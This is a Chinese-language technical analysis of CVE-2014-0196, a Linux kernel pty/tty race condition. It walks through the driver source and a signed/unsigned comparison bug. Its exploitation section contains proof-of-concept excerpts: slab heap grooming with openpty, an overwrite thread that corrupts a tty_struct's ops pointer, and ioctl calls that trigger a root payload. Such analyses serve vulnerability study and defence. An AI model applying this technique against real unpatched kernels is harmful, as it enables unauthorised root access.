前置知识
1. pty/tty。历史非常悠久的产物,主要用于终端的输入输出。介绍性的文章:http://www.linusakesson.net/programming/tty/
2. slab。主要用于分配特定大小的内存,防止内存碎片、空洞,有点类似windows内核里的Lookaside。百度百科相关文章:http://baike.baidu.com/view/5870164.htm?fr=aladdin
CVE-2014-0196
这个漏洞据称是隐藏在linux内核中长达5年之久,随着android的兴起,越来越多的人研究linux,linux下的内核漏洞也一个个被安全人员所发现。
这个漏洞的主要成因是因为在pty/tty设备驱动中在访问某些资源的时候没有正确的加锁处理,导致并发状态下存在条件竞争的bug。
漏洞成因
主要结构
首先来看几个重要的结构:
struct tty_buffer {
struct tty_buffer *next;
char *char_buf_ptr;
unsigned char *flag_buf_ptr;
int used;
int size;
int commit;
int read;
/* Data points here */
unsigned long data[0];
};
tty_buffer是一个动态大小的对象,指针char_buf_ptr通常是指向data的第一个字节,flag_buf_ptr指针指向data+ size位置。size的取值通常可以是以下的几个:256,512,768,1024,1280,1536,1792(TTY_BUFFER_PAGE)。
所以,tty_buffer对象的实际大小为:2 * size+ sizeof(tty_buffer)。2*size主要是因为char_buf和flag_buf的内容。所以tty_buffer可能被保存在如下的内核堆slab中:kmalloc-1024,kmalloc-2048,kmalloc-4096。
struct tty_bufhead {
struct work_struct work;
spinlock_t lock;
struct tty_buffer *head; /* Queue head */
struct tty_buffer *tail; /* Active buffer */
struct tty_buffer *free; /* Free queue head */
int memory_used; /* Buffer space used excluding free queue */
};
顾名思义,tty_bufhead结构是各个tty_buffer的链表头。同时,tail字段还指向最后一个,即当前活跃的那个tty_buffer。它在空闲链表中保存的字节数通常小于512字节。
struct tty_struct {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
/* ... */
struct tty_bufhead buf; /* Locked internally */
/* ... */
};
tty_struct数据结构在内核中标识了一个tty/pty。其中buf字段即上述的tty_bufhead数据结构。
关键函数分析
问题主要出在tty_insert_flip_string_fixed_flag这个函数中,函数调用堆栈大致如下:
write(pty_fd) in userspace ->
sys_write() in kernelspace ->
tty_write() ->
pty_write() ->
tty_insert_flip_string_fixed_flag()
代码如下:
int tty_insert_flip_string_fixed_flag(struct tty_struct *tty,
const unsigned char *chars, char flag, size_t size)
{
int copied = 0;
do {
int goal = min_t(size_t, size - copied, TTY_BUFFER_PAGE);
int space = tty_buffer_request_room(tty, goal); /* -1- */
struct tty_buffer *tb = tty->buf.tail;
/* If there is no space then tb may be NULL */
if (unlikely(space == 0))
break;
memcpy(tb->char_buf_ptr + tb->used, chars, space); /* -2- */
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space; /* -3- */
copied += space;
chars += space;
/* There is a small chance that we need to split the data over
several buffers. If this is the case we must loop */
} while (unlikely(size > copied));
return copied;
}
这个函数逻辑很简单,在-1-处调用tty_buffer_request_room函数判断是否还有空闲内存,如果没有则申请。
-2-处将应用层传下来的内容拷贝到tty_buffer中。
-3-处递增tty_buffer. used的字节数。
下面再来看看tty_buffer_request_room函数的实现:
int tty_buffer_request_room(struct tty_struct *tty, size_t size)
{
struct tty_buffer *b, *n;
int left; /* -1- */
unsigned long flags;
spin_lock_irqsave(&tty->buf.lock, flags); /* -2- */
/* OPTIMISATION: We could keep a per tty "zero" sized buffer to
remove this conditional if its worth it. This would be invisible
to the callers */
if ((b = tty->buf.tail) != NULL)
left = b->size - b->used; /* -3- */
else
left = 0;
if (left < size) { /* -4- */
/* This is the slow path - looking for new buffers to use */
if ((n = tty_buffer_find(tty, size)) != NULL) {
if (b != NULL) {
b->next = n;
b->commit = b->used;
} else
tty->buf.head = n;
tty->buf.tail = n;
} else
size = left;
}
spin_unlock_irqrestore(&tty->buf.lock, flags);
return size;
}
可以看到这里tty_buffer_request_room函数传进来的第二个参数size是一个size_t类型的参数,而size_t其实就是无符号整型unsignedlong。再来看看-1-处的left是一个int类型的,即有符号整型。
-2-处有一个自旋锁的保护,但是这个锁保护的范围太小了,也是造成我们竞争条件成立的一个重要原因之一。
-4-处是一个if (left< size)的比较,但是正如前所述,left是int型,有符号数,而size是一个无符号数。left的值从何而来,-3-处left = b->size - b->used;当b->size >b->use的时候,那么left有可能会是一个负数。-4-处的比较,如果负数和无符号数比较会被转成无符号数,因此条件不成立,函数以为buffer空间还是够用的,因此不会分配空间。
上面说了这么多可能还有点抽象,我特地写了一个测试程序,代码如下:
#include "stdafx.h"
int _tmain(int argc, _TCHAR* argv[])
{
int a = -1;
size_t b = 10;
if (a < b)
printf("%d < %d", a, b);
else
printf("%d > %d", a, b);
getchar();
return 0;
}
程序输出如下:
看了这个例子之后,那么上面tty_buffer_request_room函数的那个比较也就一目了然了。但是什么时候能使得int型的left(left = b->size - b->used)为负数呢,即b->size< b->used。下面来看一个竞争条件成立时的场景示意图:
从上图可以看出,赢得竞争条件的最大要诀是B进程在进入tty_buffer_request_room函数并计算left值的时候,A进程还没来得急更新tb->used的值。
正因为memcpy函数的执行耗时比较久,所以使得上述的假设有很大的几率能够满足竞争条件。
当前tty_buffer被写满之后,即tb->used> tb->size,那么我们后续的写入操作就可以随便我们控制写到相邻的tty_struct中去了。
如何利用
Poc主要以kmalloc-1024为例:
1.首先创建一个我们用来溢出用的目标tty_struct。
if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
}
2.然后创建30个tty_struct,使得slab堆变得排列有序。
#define RUN_ALLOCS 30
for (j = 0; j < RUN_ALLOCS; ++j)
if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
}
3.创建线程开始溢出。
void *overwrite_thread_fn(void *p) {
write(slave_fd, buf, 511);
write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
write(slave_fd, &overwrite, sizeof(overwrite));
}
前面两句主要用来写满一个slab,其中的32字节表示sizeof(structtty_buffer)。最后一句write(slave_fd, &overwrite, sizeof(overwrite));如果在赢得竞争条件的情况下,会覆盖后面的salb开头的几个字节,于是乎该tty_struct就被改写了。其中tty_struct结构中有一个ops成员,该成员是一个指针数组,其中的每个元素对应着一个tty设备的操作,例如open(),close(),ioct()等。
overwrite指针数组的每个元素都指向payload,只要对每个设备执行open、ioctl等操作,就有机会触发那个溢出的tty_struct,从而获得root权限。
4.触发payload
for (j = 0; j < RUN_ALLOCS; ++j) {
if (j == RUN_ALLOCS / 2)
continue;
ioctl(fds[j], 0xdeadbeef);
ioctl(fds2[j], 0xdeadbeef);
close(fds[j]);
close(fds2[j]);
}
ioctl(master_fd, 0xdeadbeef);
ioctl(slave_fd, 0xdeadbeef);
漏洞修复
补丁很简单,就是在tty write外层加了一个锁。
..
参考文章
http://www.linusakesson.net/programming/tty/
https://github.com/jocover/CVE-2014-0196/blob/master/cve-2014-0196-md.c